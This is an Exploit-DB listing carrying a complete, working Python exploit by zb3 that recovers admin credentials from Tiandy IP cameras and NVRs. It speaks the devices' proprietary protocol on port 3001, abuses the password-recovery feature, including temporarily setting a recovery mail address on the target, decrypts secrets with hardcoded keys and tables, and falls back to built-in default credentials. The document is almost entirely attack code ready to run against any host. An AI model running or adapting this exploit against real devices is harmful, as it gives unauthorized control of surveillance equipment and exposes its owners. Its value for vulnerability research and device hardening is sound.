Tiandy IPC and NVR 9.12.7 - Credential Disclosure

EDB-ID:

48799

CVE:

N/A


Author:

zb3

Type:

webapps


Platform:

Hardware

Date:

2020-09-10


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

# Exploit Title: Tiandy IPC and NVR 9.12.7 - Credential Disclosure
# Date: 2020-09-10
# Exploit Author: zb3
# Vendor Homepage: http://en.tiandy.com
# Product Link: http://en.tiandy.com/index.php?s=/home/product/index/category/products.html
# Software Link: http://en.tiandy.com/index.php?s=/home/article/lists/category/188.html
# Version: DVRS_V9.12.7, DVRS_V11.7.4, NVSS_V13.6.1, NVSS_V22.1.0
# Tested on: Linux
# CVE: N/A


# Requires Python 3 and PyCrypto

# For more details and information on how to escalate this further, see:
# https://github.com/zb3/tiandy-research


import sys
import hashlib
import base64
import socket
import struct

from Crypto.Cipher import DES


def main():
  if len(sys.argv) != 2:
    print('python3 %s [host]' % sys.argv[0], file=sys.stderr)
    exit(1)

  host = sys.argv[1]

  conn = Channel(host)
  conn.connect()

  crypt_key = conn.get_crypt_key(65536)

  attempts = 2
  tried_to_set_mail = False
  ok = False

  while attempts > 0:
    attempts -= 1

    code = get_psw_code(conn)

    if code == False:
      # psw not supported
      break

    elif code == None:
      if not tried_to_set_mail:
        print("No PSW data found, we'll try to set it...", file=sys.stderr)

        tried_to_set_mail = True
        if try_set_mail(conn, 'a@a.a'):
          code = get_psw_code(conn)

    if code == None:
      print("couldn't set mail", file=sys.stderr)
      break

    rcode, password = recover_with_code(conn, code, crypt_key)

    if rcode == 5:
      print('The device is locked, try again later.', file=sys.stderr)
      break

    if rcode == 0:
      print('Admin', password)
      ok = True
      break

  if tried_to_set_mail:
    try_set_mail(conn, '')

  if not code:
    print("PSW is not supported, trying default credentials...", file=sys.stderr)

    credentials = recover_with_default(conn, crypt_key)

    if credentials:
      user, pw = credentials
      print(user, pw)

      ok = True

  if not ok:
    print('Recovery failed', file=sys.stderr)
    exit(1)


def try_set_mail(conn, target):
  conn.send_msg(['PROXY', 'USER', 'RESERVEPHONE', '2', '1', target, 'FILETRANSPORT'])
  resp = conn.recv_msg()

  return resp[4:7] == ['RESERVEPHONE', '2', '1']

def get_psw_code(conn):
  conn.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(b'Admin').decode(), base64.b64encode(b'Admin').decode(), '', '65536', 'UTF-8', '0', '1'])
  resp = conn.recv_msg()

  if resp[4] != 'FINDPSW':
    return False

  psw_reg = psw_data = None

  if len(resp) > 7:
    psw_reg = resp[6]
    psw_data = resp[7]

  if not psw_data:
    return None

  psw_type = int(resp[5])

  if psw_type not in (1, 2, 3):
    raise Exception('unsupported psw type: '+str(psw_type))

  if psw_type == 3:
    psw_data = psw_data.split('"')[3]

  if psw_type == 1:
    psw_data = psw_data.split(':')[1]
    psw_key = psw_reg[:0x1f]

  elif psw_type in (2, 3):
    psw_key = psw_reg[:4].lower()

  psw_code = td_decrypt(psw_data.encode(), psw_key.encode())
  code = hashlib.md5(psw_code).hexdigest()[24:]

  return code


def recover_with_code(conn, code, crypt_key):
  conn.send_msg(['IP', 'USER', 'SECURITYCODE', code, 'FILETRANSPORT'])
  resp = conn.recv_msg()

  rcode = int(resp[6])

  if rcode == 0:
    return rcode, decode(resp[8].encode(), crypt_key).decode()

  return rcode, None


def recover_with_default(conn, crypt_key):
  res = conn.login_with_key(b'Default', b'Default', crypt_key)
  if not res:
    return False

  while True:
    msg = conn.recv_msg()

    if msg[1:5] == ['IP', 'INNER', 'SUPER', 'GETUSERINFO']:
      return decode(msg[6].encode(), crypt_key).decode(), decode(msg[7].encode(), crypt_key).decode()


###
### lib/des.py
###

def reverse_bits(data):
  return bytes([(b * 0x0202020202 & 0x010884422010) % 0x3ff for b in data])

def pad(data):
  if len(data) % 8:
    padlen = 8 - (len(data) % 8)
    data = data + b'\x00' * (padlen-1) + bytes([padlen])

  return data

def unpad(data):
  padlen = data[-1]

  if 0 < padlen <= 8 and data[-padlen:-1] == b'\x00'*(padlen-1):
    data = data[:-padlen]

  return data

def encrypt(data, key):
  cipher = DES.new(reverse_bits(key), 1)
  return reverse_bits(cipher.encrypt(reverse_bits(pad(data))))

def decrypt(data, key):
  cipher = DES.new(reverse_bits(key), 1)
  return unpad(reverse_bits(cipher.decrypt(reverse_bits(data))))

def encode(data, key):
  return base64.b64encode(encrypt(data, key))

def decode(data, key):
  return decrypt(base64.b64decode(data), key)


###
### lib/binproto.py
###

def recvall(s, l):
  buf = b''
  while len(buf) < l:
    nbuf = s.recv(l - len(buf))
    if not nbuf:
      break

    buf += nbuf

  return buf

class Channel:
  def __init__(self, ip, port=3001):
    self.ip = ip
    self.ip_bytes = socket.inet_aton(ip)[::-1]
    self.port = port
    self.msg_seq = 0
    self.data_seq = 0
    self.msg_queue = []

  def fileno(self):
    return self.socket.fileno()

  def connect(self):
    self.socket = socket.socket()
    self.socket.connect((self.ip, self.port))

  def reconnect(self):
    self.socket.close()
    self.connect()

  def send_cmd(self, data):
    self.socket.sendall(b'\xf1\xf5\xea\xf5' + struct.pack('<HH8xI', self.msg_seq, len(data) + 20, len(data)) + data)
    self.msg_seq += 1

  def send_data(self, stream_type, data):
    self.socket.sendall(struct.pack('<4sI4sHHI', b'\xf1\xf5\xea\xf9', self.data_seq, self.ip_bytes, 0, len(data) + 20, stream_type) + data)
    self.data_seq += 1


  def recv(self):
    hdr = recvall(self.socket, 20)
    if hdr[:4] == b'\xf1\xf5\xea\xf9':
      lsize, stream_type = struct.unpack('<14xHI', hdr)
      data = recvall(self.socket, lsize - 20)

      if data[:4] != b'NVS\x00':
        print(data[:4], b'NVS\x00')
        raise Exception('invalid data header')

      return None, [stream_type, data[8:]]


    elif hdr[:4] == b'\xf1\xf5\xea\xf5':
      lsize, dsize = struct.unpack('<6xH10xH', hdr)

      if lsize != dsize + 20:
        raise Exception('size mismatch')

      msgs = []

      for msg in recvall(self.socket, dsize).decode().strip().split('\n\n\n'):
        msg = msg.split('\t')
        if '.' not in msg[0]:
          msg = [self.ip] + msg

        msgs.append(msg)

      return msgs, None

    else:
      raise Exception('invalid packet magic: ' + hdr[:4].hex())

  def recv_msg(self):
    if len(self.msg_queue):
      ret = self.msg_queue[0]
      self.msg_queue = self.msg_queue[1:]

      return ret

    msgs, _ = self.recv()

    if len(msgs) > 1:
      self.msg_queue.extend(msgs[1:])

    return msgs[0]

  def send_msg(self, msg):
    self.send_cmd((self.ip+'\t'+'\t'.join(msg)+'\n\n\n').encode())

  def get_crypt_key(self, mode=1, uname=b'Admin', pw=b'Admin'):
    self.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(uname).decode(), base64.b64encode(pw).decode(), '', str(mode), 'UTF-8', '805306367', '1'])

    resp = self.recv_msg()

    if resp[4:6] != ['LOGONFAILED', '3']:
      print(resp)
      raise Exception('unrecognized login response')

    crypt_key = base64.b64decode(resp[8])
    return crypt_key

  def login_with_key(self, uname, pw, crypt_key):
    self.reconnect()

    hashed_uname = base64.b64encode(hashlib.md5(uname.lower()+crypt_key).digest())
    hashed_pw = base64.b64encode(hashlib.md5(pw+crypt_key).digest())

    self.send_msg(['IP', 'USER', 'LOGON', hashed_uname.decode(), hashed_pw.decode(), '', '1', 'UTF-8', '1', '1'])
    resp = self.recv_msg()

    if resp[4] == 'LOGONFAILED':
      return False

    self.msg_queue = [resp] + self.msg_queue

    return True

  def login(self, uname, pw):
    crypt_key = self.get_crypt_key(1, uname, pw)

    if not self.login_with_key(uname, pw, crypt_key):
      return False

    return crypt_key



###
### lib/crypt.py
###

pat = b'abcdefghijklmnopqrstuvwxyz0123456789'

def td_asctonum(code):
  if code in b'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
    code += 0x20

  if code not in pat:
    return None

  return pat.index(code)


def td_numtoasc(code):
  if code < 36:
    return pat[code]

  return None

gword = [
  b'SjiW8JO7mH65awR3B4kTZeU90N1szIMrF2PC',
  b'04A1EF7rCH3fYl9UngKRcObJD6ve8W5jdTta',
  b'brU5XqY02ZcA3ygE6lf74BIG9LF8PzOHmTaC',
  b'2I1vF5NMYd0L68aQrp7gTwc4RP9kniJyfuCH',
  b'136HjBIPWzXCY9VMQa7JRiT4kKv2FGS5s8Lt',
  b'Hwrhs0Y1Ic3Eq25a6t8Z7TQXVMgdePuxCNzJ',
  b'WAmkt3RCZM829P4g1hanBluw6eVGSf7E05oX',
  b'dMxreKZ35tRQg8E02UNTaoI76wGSvVh9Wmc1',
  b'i20mzKraY74A6qR9QM8H3ecUkBlpJC1nyFSZ',
  b'XCAUP6H37toQWSgsNanf0j21VKu9T4EqyGd5',
  b'dFZPb9B6z1TavMUmXQHk7x402oEhKJD58pyG',
  b'rg8V3snTAX6xjuoCYf519BzWRtcMl2OiZNeI',
  b'dZe620lr8JW4iFhNj3K1x59Una7PXsLGvSmB',
  b'5yaQlGSArNzek6MXZ1BPOE3xV470h9KvgYmb',
  b'f12CVxeQ56YWd7OTXDtlnPqugjJikELayvMs',
  b'9Qoa5XkM6iIrR7u8tNZgSpbdDUWvwH21Kyzh',
  b'AqGWke65Y2ufVgljEhMHJL01D8Zptvcw7CxX',
  b't960P2inR8qEVmAUsDZIpH5wzSXJ43ob1kGW',
  b'4l6SAi2KhveRHVN5JGcmx9jOC3afB7wF0ITq',
  b'tEOp6Xo87QzPbn24J3i9FjWKS1lIBVaMZeHU',
  b'zx27DH915lhs04aMJOgf6Z3pyERrGndiLwIe',
  b'8XxOBzZ02hUWDQfvL471q9RC6sAaJVFuTMdG',
  b'jON0i4C6Z3K97DkbqSypH8lRmx5o2eIwXas1',
  b'OIGT0ubwH1x6hCvEgBn274A5Q8K9e3YyzWlm',
  b'zgejY41CLwRNabovBUP2Aql7FVM8uEDXZQ0c',
  b'Z2MpQE91gdRLYJ8bGIWyOfc4v03Hjzs6VlU5',
  b't6PuvrBXeoHk5FJW08DYQSI49GCwZ27cA1UK',
  b'FiBA53IMW97kYNz82GhHf1yUCdL0nlvRD46s',
  b'2Vz3b06h54jmc7a8AIYtNHM1iQU9wBXWyJkR',
  b'wyI42azocV3UOX6fk579hMH8eEGJsgFuBmqb',
  b'TxmnK4ljJ9iroY8vVtg3Rae2L516fBWUuXAS',
  b'z6Y1bPrJEln0uWeLKkjo9IZ2y7ROcFHqBm54',
  b'x064LFB39TsXeryqvt2pZN8QIERuWAVUmwjJ',
  b'76qg85yB31uH90YbZofsjKrRGiTVndAEtFMx',
  b'WjwTEbCA752kq89shcaLB1xO64rgMYnoFiJQ',
  b'u6307O4J2DeZs8UYyjlzfX91KGmavEdwTRSg'
]

def td_decrypt(data, key):
  kdx = 0
  ret = []

  for idx, code in enumerate(data):
    while True:
      if kdx >= len(key):
        kdx = 0

      kcode = key[kdx]
      knum = td_asctonum(kcode)

      if knum is None:
        kdx += 1
        continue

      break

    if code not in gword[knum]:
      return None

    cpos = gword[knum].index(code)
    ret.append(td_numtoasc(cpos))

    kdx += 1

  return bytes(ret)



if __name__ == '__main__':
    main()